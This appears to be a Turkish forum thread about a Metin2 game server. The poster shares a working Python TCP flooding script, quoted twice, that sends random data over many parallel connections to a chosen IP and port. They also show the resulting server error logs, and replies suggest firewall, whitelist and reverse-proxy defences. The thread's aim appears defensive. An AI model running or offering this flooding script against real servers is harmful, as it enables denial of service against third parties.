Cevaplanmadı Ddos veya Packet Saldırıları Hakkında

[athenoraproject]

ROHAN2 WORLD 1-120 TR TİPİ OFFICIAL YOHARA, BALATHOR VE AMON! 80. GÜNÜNDE! +10.000 ONLİNE! HİLE VE BOT %100 ENGELLİ HEMEN TIKLA!

Arkadaşlar merhaba dün martysama altyapısı kullandığım oyunda ddos ve packet saldırıları hakkında araştırma yaparken bir sorun buldum
​

# -*- coding: utf-8 -*-
import socket
import threading
import time
import os

def send_tcp_packets(ip, port, data_size, thread_id):
    data = os.urandom(data_size)
    while True:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sock.sendall(data)
            print("[Thread-{}] Gonderildi {} byte {}:{}".format(thread_id, data_size, ip, port))
            sock.close()
        except Exception as e:
            print("[Thread-{}] Hata: {}".format(thread_id, e))
        time.sleep(0.1)

if __name__ == "__main__":
    ip = input("Hedef IP: ")
    port = int(input("Hedef Port: "))
    data_size = int(input("Gonderilecek veri boyutu (byte): "))
    thread_count = int(input("Kac paralel baglanti acsin?: "))

    threads = []
    for i in range(thread_count):
        t = threading.Thread(target=send_tcp_packets, args=(ip, port, data_size, i + 1))
        t.daemon = True
        t.start()
        threads.append(t)

    print("{} thread ile {}:{} hedefi test edilmeye baslandi. Ctrl+C ile durdurabilirsin.".format(thread_count, ip, port))

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("Test durduruldu.")

Yukarıda verdiğim python scriptidir sunucunun ip ve channel portlarını girdiğiniz zaman
ddos veya packet verileri gönderiyor tam emin değilim


Ancak bu saldırılar kuvvetli kalıyor ki
​

SYSERR: May 20 19:39:19 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:22 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 21
SYSERR: May 20 19:39:23 :: Process: UNKNOWN HEADER: 178, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:24 :: Process: UNKNOWN HEADER: 108, LAST HEADER: 10(1), REMAIN BYTES: 5839, fd: 21
SYSERR: May 20 19:39:24 :: pid_init:
Start of pid: 1105

SYSERR: May 20 19:39:24 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:25 :: Analyze: Handshake phase does not handle packet 241 (fd 21)
SYSERR: May 20 19:39:25 :: Process: UNKNOWN HEADER: 147, LAST HEADER: 241(67), REMAIN BYTES: 4313, fd: 21
SYSERR: May 20 19:39:26 :: Process: UNKNOWN HEADER: 199, LAST HEADER: 0(0), REMAIN BYTES: 1460, fd: 21
SYSERR: May 20 19:39:29 :: Analyze: Handshake phase does not handle packet 75 (fd 20)
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 201, LAST HEADER: 254(1), REMAIN BYTES: 1452, fd: 20
SYSERR: May 20 19:39:29 :: pid_init:
Start of pid: 1110

SYSERR: May 20 19:39:29 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 173, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 99, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:32 :: socket_accept: accept: Software caused connection abort (fd 12)
SYSERR: May 20 19:39:32 :: Analyze: Handshake phase does not handle packet 30 (fd 20)
SYSERR: May 20 19:39:32 :: Process: UNKNOWN HEADER: 240, LAST HEADER: 0(1), REMAIN BYTES: 1393, fd: 20
SYSERR: May 20 19:39:34 :: pid_init:
Start of pid: 1119

Böyle paket hataları alıyorum sysser syslog şişiyor böylelikle bu konu hakkında fikri olan yazabilir mi fixi nedir?



​

 

[Xorvex]

@Tunga ne diyosun knka bu duruma

 

[Agora Metin2]

Arkadaşlar merhaba dün martysama altyapısı kullandığım oyunda ddos ve packet saldırıları hakkında araştırma yaparken bir sorun buldum
​

# -*- coding: utf-8 -*-
import socket
import threading
import time
import os

def send_tcp_packets(ip, port, data_size, thread_id):
    data = os.urandom(data_size)
    while True:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sock.sendall(data)
            print("[Thread-{}] Gonderildi {} byte {}:{}".format(thread_id, data_size, ip, port))
            sock.close()
        except Exception as e:
            print("[Thread-{}] Hata: {}".format(thread_id, e))
        time.sleep(0.1)

if __name__ == "__main__":
    ip = input("Hedef IP: ")
    port = int(input("Hedef Port: "))
    data_size = int(input("Gonderilecek veri boyutu (byte): "))
    thread_count = int(input("Kac paralel baglanti acsin?: "))

    threads = []
    for i in range(thread_count):
        t = threading.Thread(target=send_tcp_packets, args=(ip, port, data_size, i + 1))
        t.daemon = True
        t.start()
        threads.append(t)

    print("{} thread ile {}:{} hedefi test edilmeye baslandi. Ctrl+C ile durdurabilirsin.".format(thread_count, ip, port))

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("Test durduruldu.")

Yukarıda verdiğim python scriptidir sunucunun ip ve channel portlarını girdiğiniz zaman
ddos veya packet verileri gönderiyor tam emin değilim


Ancak bu saldırılar kuvvetli kalıyor ki
​

SYSERR: May 20 19:39:19 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:22 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 21
SYSERR: May 20 19:39:23 :: Process: UNKNOWN HEADER: 178, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:24 :: Process: UNKNOWN HEADER: 108, LAST HEADER: 10(1), REMAIN BYTES: 5839, fd: 21
SYSERR: May 20 19:39:24 :: pid_init:
Start of pid: 1105

SYSERR: May 20 19:39:24 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:25 :: Analyze: Handshake phase does not handle packet 241 (fd 21)
SYSERR: May 20 19:39:25 :: Process: UNKNOWN HEADER: 147, LAST HEADER: 241(67), REMAIN BYTES: 4313, fd: 21
SYSERR: May 20 19:39:26 :: Process: UNKNOWN HEADER: 199, LAST HEADER: 0(0), REMAIN BYTES: 1460, fd: 21
SYSERR: May 20 19:39:29 :: Analyze: Handshake phase does not handle packet 75 (fd 20)
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 201, LAST HEADER: 254(1), REMAIN BYTES: 1452, fd: 20
SYSERR: May 20 19:39:29 :: pid_init:
Start of pid: 1110

SYSERR: May 20 19:39:29 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 173, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 99, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:32 :: socket_accept: accept: Software caused connection abort (fd 12)
SYSERR: May 20 19:39:32 :: Analyze: Handshake phase does not handle packet 30 (fd 20)
SYSERR: May 20 19:39:32 :: Process: UNKNOWN HEADER: 240, LAST HEADER: 0(1), REMAIN BYTES: 1393, fd: 20
SYSERR: May 20 19:39:34 :: pid_init:
Start of pid: 1119

Böyle paket hataları alıyorum sysser syslog şişiyor böylelikle bu konu hakkında fikri olan yazabilir mi fixi nedir?



​

Merhaba,

DDos saldılarında bu gibi durumlar yaşanabiliyor, başlı başına network uzmanlığı gerektiren bir konu örneğin UDP paketlerini engellemek kolay fakat TCP için aynı senaryo geçerli değil, kısaca muhtemel çözümlerden bahsedeyim:

1.Seçenek:
Koruma olarak firewall kullanmanız gerekli, bu gibi trafik gelen IP'lerin engelleyebilirsiniz.

2. Seçenek:
Bir diğer seçenek (global gerçek 10000 oyunculu bir oyunda gördüm not:bunun başka örneğini görmedim, anlık 10000 oyuncu olan başka server da görmedim), kayıt olduktan sonra siteden 1 kez login olmasını istiyordu kullanıcılarının, bu süreçte recaptcha olduğu için botlar geçemiyordu, sonrasında bu ipleri whitelist'e alıyordu, game sunucusuna sadece bu ipler erişebiliyordu.

3. Seçenek:
Game sunucularını direk expose etmemek, araya bir reverseproxy yapacak sunucu eklemek yani game ile oyuncu trafiği direkt olmayacak her zaman ayrı bir proxy sunucu üzerinden geçecek, firewall işlemlerini burada halletmek.

 

[athenoraproject]

Merhaba,

DDos saldılarında bu gibi durumlar yaşanabiliyor, başlı başına network uzmanlığı gerektiren bir konu örneğin UDP paketlerini engellemek kolay fakat TCP için aynı senaryo geçerli değil, kısaca muhtemel çözümlerden bahsedeyim:

1.Seçenek:
Koruma olarak firewall kullanmanız gerekli, bu gibi trafik gelen IP'lerin engelleyebilirsiniz.

2. Seçenek:
Bir diğer seçenek (global gerçek 10000 oyunculu bir oyunda gördüm not:bunun başka örneğini görmedim, anlık 10000 oyuncu olan başka server da görmedim), kayıt olduktan sonra siteden 1 kez login olmasını istiyordu kullanıcılarının, bu süreçte recaptcha olduğu için botlar geçemiyordu, sonrasında bu ipleri whitelist'e alıyordu, game sunucusuna sadece bu ipler erişebiliyordu.

3. Seçenek:
Game sunucularını direk expose etmemek, araya bir reverseproxy yapacak sunucu eklemek yani game ile oyuncu trafiği direkt olmayacak her zaman ayrı bir proxy sunucu üzerinden geçecek, firewall işlemlerini burada halletmek.

Yorumunuz için teşekkür ederim, Firewall kurmak en mantıklısı geliyor ancak source tabanlı herhangi bir engelleme mümkün değil midir?

 

[Agora Metin2]

Yorumunuz için teşekkür ederim, Firewall kurmak en mantıklısı geliyor ancak source tabanlı herhangi bir engelleme mümkün değil midir?

Konu source ile alakalı değil, sunucu trafiği ile alakalı o yüzden source da bir şey yapmak çözüm olmaz.